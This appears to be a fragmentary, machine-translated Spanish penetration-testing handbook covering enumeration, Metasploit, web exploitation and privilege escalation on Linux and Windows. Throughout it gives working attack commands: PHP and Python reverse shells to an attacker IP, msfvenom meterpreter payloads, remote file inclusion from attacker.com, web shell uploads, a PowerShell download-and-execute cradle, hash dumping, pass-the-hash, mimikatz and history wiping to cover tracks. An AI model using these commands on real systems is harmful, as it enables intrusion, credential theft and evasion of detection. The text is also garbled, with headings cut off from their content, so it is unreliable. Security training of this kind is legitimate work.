Documentos de Académico
Documentos de Profesional
Documentos de Cultura
También hay muchos otros directorios, pero solo mencioné los que
usamos principalmente.
Comandos básicos
cd - para cambiar el directorio (uso: cd dirname)
ls - lista de archivos (uso: ls / home, ls)
ls -la -> para listar archivos en detalles
pwd: imprime el directorio de trabajo (uso: pwd)
cat: imprime el contenido del archivo (uso: nombre de archivo cat)
más: también imprime el contenido del archivo (uso: más nombre de
archivo)
cp - para copiar archivos (uso: cp file / dir / newname)
mv - para mover archivos (mv file / dir / newname
mkdir - crear directorio (uso: - hacker mkdir)
rm - eliminar archivo (uso: rm hacker.txt)
rmdir - eliminar directorio (uso: hacker rmdir)
touch: crea un archivo en blanco (uso: touch hacker.txt)
whereis: muestra la ubicación del archivo (uso: whereis cat)
localizar - buscar archivos por nombre (uso: localizar ping)
man - manual de comandos del sistema muy útil (uso: man
aquí hay muchos comandos por favor échale un vistazo
Comandos y utilidades de red básicos
ping
arp
telnet
ifconfig
iptables
netstat
route
traceroute
ss
whomai
hostname
w
lslogin
sudo
dpkg
ps
users
crontab
less
more
apt
service
free
top
mem
grep
awk
find
lsof
last
kill
uname
watch
df
dd
Terminal
comando chown
comando chmod
group
world
Hay tres tipos de permisos que Linux permite para cada archivo.
read(4 or r)
write(2 or w)
execute(1 or x)
¡¡Así que trata de pensar en esto !!
7 = 4+2+1 (read/write/execute)
6 = 4+2 (read/write)
5 = 4+1 (read/execute)
4 = 4 (read)
3 = 2+1 (write/execute)
2 = 2 (write)
1 = 1 (execute)
Ejemplo:
chmod 777 hacker.sh
chmod 600 hacker.sh
\ Usuarios: esta carpeta contiene una subcarpeta para cada usuario que
haya iniciado sesión en el sistema al menos una vez
\ Public: esta carpeta sirve como búfer para que los usuarios de una
computadora compartan archivos. De forma predeterminada, esta
carpeta es accesible para todos los usuarios que pueden iniciar sesión
en la computadora.
\ System, \ System32, \ SysWOW64: estas carpetas almacenan archivos
de biblioteca de vínculos dinámicos (DLL) que implementan las
características principales de Windows y la API de Windows. Cada vez
que un programa le pide a Windows que cargue un archivo DLL y no
especifica una ruta, estas carpetas se buscan después de buscar la
carpeta del programa.
Registro de Windows
El Registro es una base de datos que se utiliza para almacenar
configuraciones y opciones para los sistemas Windows. Contiene
información y configuraciones para todo el hardware, software,
usuarios y preferencias de la PC. Siempre que un usuario realiza
cambios en la configuración del Panel de control, Asociaciones de
archivos, Políticas del sistema o software instalado, los cambios se
reflejan y almacenan en el Registro.
Comandos de navegación básicos de Windows
cd / chdir: cambiar de directorio.
2.whoami / all: enumera el usuario actual, sid, los grupos de los que el
usuario actual es miembro y sus sids, así como el nivel de privilegio
actual.
HTTP / S: los servidores web utilizan HTTP / HTTP para recibir solicitudes
de los navegadores de los clientes.
Enumeración FTP
nmap -A -p21 <targetIP>
Primero verifique el inicio de sesión ftp anónimo en el servidor, si el inicio
de sesión FTP anónimo está habilitado en el servidor, luego conéctese
con el siguiente comando.
ftp <targetIP>
ssh2-enum-algos.nse
ssh-auth-methods.nse
ssh-brute.nse
ssh-hostkey.nse
ssh-publickey-acceptance.nse
ssh-run.nse
sshv1.nse
Enumeración SMTP
nmap -A -p25 <targetIP>
Vamos a enumerarlo
# nmap -p2049 -A <targetIP>
nfs-ls.nse
nfs-showmount.nse
nfs-statfs.nse
showmount -e <targetIP>
/home/server/ *
Enumerar rpcbind
rpcinfo -p <targetIP>
Enumeración de samba
# smbclient -L <targetIP>
Para obtener información más detallada, utilice smbmap
# smbmap -H <targetIP>
# smbclient \\\\<targetIP>\\<sharename>
Después de conectarse correctamente, use el comando "ayuda" para
enumerar los comandos de navegación e intente obtener más
información de esos recursos compartidos.
Uso
# enum4linux -a <targetIP>
Enumeración SMTP
Obtenga información SMTP usando telnet y nc en la ejecución del
servidor de destino smtp.
# nc <targetIP> 25
O
# telnet <targetIP> 25
La enumeración es la clave del éxito
Enfoques de Windows
Introducción
aprenderemos los enfoques de enumeración de Windows, las
herramientas para usar y las técnicas para implementar.
Enumeración NetBIOS
Nbtscan
nbtscan es una herramienta que se utiliza para escanear redes en busca
de información de nombres NetBIOS.
Uso
# nbtscan -v <TargetIP>
En Windows también hay una herramienta llamada nbtstat, también
puedes usarla para enumerar.
# nbtstat -A <target_IP_Address>
Enumeración de SMB
IPC$
Admin$
C$
hacker
smbmap -h para obtener información más detallada
enum4linux
# enum4linux -a <TargetIP>
Wininfo
# winfo <targetIP> -n
Rpcclient
Enumeración SNMP
SNMP significa Protocolo simple de administración de red y se utiliza
para intercambiar información de administración entre dispositivos de
red. Incluso puede usar SNMP para configurar el enrutador y verificar su
estado.
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nse
uso
# nmap -A -p <TargetIP>
nmap -p161 --script snmp-info,snmp-interfaces,snmp-netstat,snmp-
brute <TargetIP>
snmpcheck
uso:
$ man snmpcheck
snmpcheck -t <TargetIP> -c public
snmpwalk
uso:
# man snmpwalk
# snmpwalk -v 2c <TargetIP> -c public
Metasploit framework
discutiremos un marco de prueba de penetración llamado Metasploit-
Framework.
# whatis msfconsole
# whatis msfvenom
# man msfconsole
Características de Metasploit
Es fácil de usar.
Viene con más de 2014 exploits que incluyen 0 días, 1097 auxiliares, 343
módulos de publicación, 566 cargas útiles, etc. que se actualizan
regularmente.
Cualquiera puede desarrollar sus exploits, auxiliares de carga útil y
usarlo con metasploit fácilmente.
Proporciona una buena interfaz entre el objetivo y el usuario.
Tiene algunos atajos que son muy útiles durante la prueba de
penetración.
¿Qué es msfvenom?
Módulos Metasploit
Auxiliar
Payloads consist of code that runs remotely, while encoders ensure that
payloads make it to their destination intact. Nops keep the payload sizes
consistent across exploit attempts.
# ls /usr/share/metasploit-framework/modules/payloads/
# ls /usr/share/metasploit-framework/modules/encoders/
cmd generic mipsbe mipsle php ppc ruby sparc x64 x86
# ls /usr/share/metasploit-framework/modules/nops/
Exploits
post
Estos son módulos posteriores a la explotación que pueden recopilar
rápidamente información valiosa sobre un objetivo, ayudan a escalar
privilegios, datos confidenciales, credenciales, etc., fácilmente.
#ls /usr/share/metasploit-framework/modules/post
# ls /usr/share/metasploit-framework/modules/post/windows/escalate
| head
droplnk.rb
getsystem.rb
golden_ticket.rb
ms10_073_kbdlayout.rb
screen_unlock.rb
unmarshal_cmd_exec.rb
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information
about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version
numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more
modules
back Move back from the current context
clearm Clear the module stack
info Displays information about one or more modules
listm List the module stack
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it
active
previous Sets the previously loaded module as the current
module
pushm Pushes the active or list of modules onto the
module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Command Description
------- -----------
analyze Analyze database information about a specific
address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the
database
db_import Import a scan result file (filetype will be auto-
detected)
db_nmap Executes nmap and records the output
automatically
db_rebuild_cache Rebuilds the database-stored module cache
(deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the
default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Command Description
------- -----------
edit Edit the current module or a file with the preferred
editor
irb Open an interactive Ruby shell in the current context
log Display framework.log paged to the end if possible
pry Open the Pry debugger on the current module or
Framework
reload_lib Reload Ruby library files from specified paths
Examples
sessions -k 1
Matching Modules
================
# Name Disclosure Date Rank Check
Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access
normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan
normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal
No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce
normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal
No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal
No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal
No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner
normal No SAPRouter Port Scanner
Exploit target:
Id Name
-- ----
RPORT => 80
msfvenom -l
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php &&
pbpaste >> shell.php
# msfconsole
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4
775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed
5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16a
e931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7
f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404e
e:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13e
d5abd30aa94ddeb3cf52d:::
meterpreter >
Evaluación de vulnerabilidad
Evaluación de la vulnerabilidad de la red
Introducción
Ejecute msfconsole
# msfconsole
[*]
Lista de comandos
Conectar openvas
Y comienza la tarea
openvas_task_start <taskID>
# msfconsole
Explotación de Linux
Introducción
buscaremos varios enfoques para explotar el destino de Linux y
obtener acceso remoto.
Searchsploit
Instalación de Searchsploit
---------------------------------------------- ---------------------------------
---------------------------------------------- ---------------------------------
---------------------------------------------- ---------------------------------
---------------------------------------------- ---------------------------------
----------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------- --------------------------------------------
Solicitudes de difusión
Etc.
Hemos aprendido algunos de ellos anteriormente, si recuerdas,
este es el momento adecuado para recordarlos.
$ man medusa
$ medusa -h
$ medusa -d
$ medusa -M ftp -q
Ncrack
$ ls -l /usr/share/ncrack/
total 904
ncrack -h
ncrack 10.10.10.180
ncrack me.hacker.com
Ncrack admite FTP, Telnet, SSH, HTTP / HTTPS, POP3 (S), SMB,
RDP, VNC
USO:
ncrack <service_name>://target:<port_number>
Apuntemos a ssh
uso:
$ hydra -h
Explotación
----------------------------------- --------------------------------------------
----------------------------------- --------------------------------------------
# msfconsole
# search tomcat_mgr_login
Matching Modules
================
0 auxiliary/scanner/http/tomcat_mgr_login normal
No Tomcat Application Manager Login Utility
[!] Changing the SSL option's value may require changing RPORT!
Matching Modules
================
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03
excellent No VSFTPD v2.3.4 Backdoor Command Execution
Usar exploit
Exploit target:
Id Name
-- ----
0 Automatic
Set options
Enlazar caparazón
Concha inversa
inyección SQL
Sqlmap
# man sqlmap
# sqlmap -h
Y la URL es:
https://www.target.com/user/profile?id=1
targetcorp
phpmyadmmin
information_schema
mysql
# sqlmap -u https://www.target.com/user/profile?id=1 -D
targetcorp --os-pwn
seleccione 1
>1
# sqlmap -u https://www.target.com/user/profile?id=1 -D
targetcorp --os-shell
URL: http://targetcorp.com/index.php?file=welcome.php
URL: http://targetcorp.com/index.php?file=../../../etc/passwd
URL: http://targetcorp.com/vuln.php?file=
http://targetcorp.com/vuln.php?file=atacker.com/shell.txt
# nc -lvp 1337
Contamos con una página web que nos permite subir una imagen
http://target.com/uploadpicture.php
http://target.com/pictures/<imagename>
http://target.com/pictures/hackershell.php?cmd=ls
Supongamos que hay una restricción, solo podemos cargar
archivos de imagen y las aplicaciones web también están
verificando el contenido del archivo, por lo que tampoco podemos
cargar archivos después de simplemente cambiar su extensión.
# man exiftool
Y copie el archivo a
cp hackershell.jpg hackershell.php.jpg
http://target.com/pictures/hackershell.php?cmd=ls
$ cd /usr/share/webshells
$ls
asp aspx cfm jsp laudanum perl php
Introducción
id
uname -a
cat /etc/issue
ifconfig
ps auxw
ps ef
route -n
netstat -auntp
watch ss -twurp
netstat -antu
cat /etc/resolv.conf
last -a
cat /etc/passwd
cat /etc/passwd |cut -f1,3,4 -d":" |grep "0:0"|cut -f1 -d":" |awk
'{print $1}'
cat /etc/group
sudo -l
Si se nos permite leer el archivo de sombra
cat /etc/shadow
crontab -l
ls -als /root/*
ls -als /etc/cron.*
getent passwd
pdbedit -L -w
pdbedit -L -v
service --status-all
cat /etc/syslog.conf
Introducción
Usando Python
Usando vi
vi
:set shell=/bin/sh
:shell
Usando ed
ed
! '/bin/sh'
Usando Perl
perl -e 'system("/bin/sh");'
Usando awk
Carcasa TTY
echo os.system('/bin/bash')
/bin/sh –i
execute('/bin/sh')
Si permitió ejecutar nc, php, ruby, perl, puede tomar shell inverso
desde allí.
# nc -nlvp 1337
php -r '$sock=fsockopen("ATTACKING-IP",1337);exec("/bin/sh -i
<&3 >&3 2>&3");'
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK
_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
file = /etc/shadow
nmap --interactive
nmap> !sh
!/bin/sh
Nano
nano
Permisos de sudo
sudo -l
!sh
más
!sh
gdb
!sh
hombre
Hash de sombra
sombra de grieta
base64
hashid <filename>
md5sum <filename>
$ ldd /usr/local/bin/program_name
Asumiendo
/tmp/program/libs
python -m SimpleHTTPServer 80
En el sistema de destino
cd /tmp/program/libs && wget
http://AtackerIP/program_name.so
use exploit/multi/handler
export LD_LIBRARY_PATH=/tmp/hacker/
cat /docker/cleanpswd.txt
Introducción
discutiremos algunas herramientas para realizar nuestro proceso
de post-explotación y ahorraremos nuestro tiempo y esfuerzos.
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
¿Cómo utilizar?
python3 -m http.server 80
PHP
php -S localhost:80
Rubí
ruby -run -ehttpd . -p80
Netcat
wget
wget http://<AttackerIP>/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Pspy
https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
Kernelpop
https://github.com/spencerdodd/kernelpop
$ cd kernelpop
$ python3 kernelpop.py
Bashark
Características
Ligero y rápido
wget
https://raw.githubusercontent.com/TheSecondSun/Bashark/mast
er/bashark.sh
y simplemente ejecútalo
chmod +x bashark.sh
./bashark.sh
Linuxprivchecker
wget //www.securitysift.com/download/linuxprivchecker.py
python3 linuxprivchecker.py
linux-exploit-sugestor-2
cd linux-exploit-suggester-2
./linux-exploit-suggester-2.pl
Características de BeRoot:
Contenedor SUID
Estibador
Reglas de sudo
wget
https://raw.githubusercontent.com/AlessandroZ/BeRoot/master/L
inux/beroot.py
chmod +x beroot.py
./beroot.py
Movimiento lateral
Secuestro de SSH
ps uax|grep sshd
``
``
``
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
``
``
Túneles SSH
https://github.com/sshuttle/sshuttle
Encadenamiento de proxy
Instalación
cd VPNPivot
./autogen.sh
./configure
make && make install
Exfiltración de datos
En la máquina de destino
**
Cubrir pistas
history -c
export HISTFILESIZE=O
export HISTSIZE=O
Para matar la sesión actual
kill -9 $$
Impacket en acción
Introducción
Impacket
https://github.com/SecureAuthCorp/impacket.git
Clonar el repositorio
Explicación
secretsdump.py DOMAIN/USER:PASSWORD@<VictimIP>
secretsdump Empire/locus:brokeme@198.162.0.1
lookupsid.py user:password@<targetip>
wmiexec.py 'Empire/administrator@192.168.10.16'
smbclient //yourIP/temp
En el sistema de destino
\\10.10.14.6\temp\whoami.exe
Explotación de Windows
Introducción
Autenticación de Windows
NTLM
Explicación de hashes LM / NT
Kerberos
¡Autenticación exitosa!
Importante .
auxiliary/admin/mssql/mssql_ntlm_stealer
auxiliary/admin/oracle/ora_ntlm_stealer
auxiliary/scanner/http/ntlm_info_enumeration
auxiliary/scanner/smtp/smtp_ntlm_domain
auxiliary/scanner/winrm/winrm_login
rcracki_mt
[http://project-rainbowcrack.com/table.htm]
[http://ophcrack.sourceforge.net/tables.php]
ruby halflm_second.rb -n
1f548398f0f49ea18e2f0dcb9562b75eaa32e75aebf1d69c -p
HALFPSWD
SMBRelay Attack
Es una especie de ataque Man in The Middle en el que el atacante
retransmite solicitudes de autenticación SMB a otro host,
obteniendo acceso a una sesión SMB autenticada si tiene éxito.
msfconsole
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=<AttackerIP> LPORT=<Port> -f exe -o hacker.exe
Introducción
systeminfo
ver
cacls
icacls
tasklist /svc
tasklist /m
tasklist /S ip /v
set
set USERPROFILE
sc query state=all
net start
schtasks
sc queryex <keyname>
ipconfig /all
ipconfig /displaydns
Conocer los puertos de escucha del sistema
netstat -ana
route print
Comandos de WMI
BIOS de wmic
wmic qfe
inicio de wmic
servicio wmic
wmic os
Comando Reg
Introducción
discutiremos algunas técnicas manuales para escalar privilegios
de acuerdo con obtener privilegios estándar en la red de destino.
Certutil
Bitsadmin
Cscript
Y ejecutarlo
** Powershell IEX **
powershell -exec bypass -c "(New-Object
Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::Default
NetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
Wmic
SMB
help
upload <filename>
ETC.
run post/windows/manage/migrate
O en caparazón meterpreter
migrate <PID>
getsystem -t 1
shell
msfvenom -p windows/meterpreter/reverse_tcp
lhost=<AttackerIP> lport=<port> prependmigrate=true
prependmigrateprocess=explorer.exe -f exe >
/root/home/Desktop/Exploitme.exe
O también podemos crear una carga útil para cambiar
directamente un usuario a administrador
En el caparazón de destino
upload /root/Desktop/Exploitme.exe
reboot
sc stop "Exploitme.exe"
sc start "Exploitme.exe"
use exploit/multi/handler
Secuestro de DLL
C: \ Windows \ System32
C: \ Windows \ Sistema
C: \ Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp
LHOST=<AttackerIP> -f dll>hacker.dll
¡¡¡Auge!!!
use incoginito
post/windows/gather/win_privs
search bypassuac
exploit/windows/local/bypassuac_comhijack
Pase el hash
Pass The Hash es la técnica mediante la cual puede explotar un
sistema directamente mediante su LM Hash.
run hashdump
o smarthashdump como
post/windows/gather/smart_hashdump
search hashdump
xfreerdp
xfreerdp --help
load mimikatz
Y correr
wdigest
Evil-WinRM https://github.com/Hackplayers/evil-winrm
Característica
Derivación AMSI
Historial de comandos
Instalación
Uso
Usando hash
Introducción
Hemos discutido los enfoques de escalado manual para el
escalado de privilegios en Windows, ahora en esto, discutiremos y
usaremos algunas herramientas y scripts para escalar nuestro
privilegio como usuario estándar.
Encender
Privilegios actuales
Permisos de servicio
cd PowerSploit
ls
cd Privesc
ls
load powershell
powershell_import '/home/powesploit/Privesc/PowerUp.ps1'
powershell_execute Invoke-AllChecks
Funciones actuales
Información de red (interfaces, arp, netstat)
Procesos corriendo
Unidades mapeadas
Documentos recientes
Credenciales almacenadas
Aplicaciones instaladas
Archivos MuiCache
Tareas programadas
Problemas conocidos
Hacer
Agregue un listado completo de directorios con profundidad
definida por el usuario
Mejorar la producción
Sherlock
load powershell
Y ejecutarlo
powershell_import '/home/Desktop/Sherlock/Sherlock.ps1'
powershell_execute "find-allvulns"
Watson: enumere los KB que faltan y sugiera exploits para
vulnerabilidades útiles de Privilege
Escalation https://github.com/rasta-mouse/Watson
https://github.com/bitsadmin/wesng
Y te dará resultado
https://github.com/carlospolop/privilege-escalation-awesome-
scripts-suite/tree/master/winPEAS
https://github.com/carlospolop/privilege-escalation-awesome-
scripts-suite/tree/master/linPEAS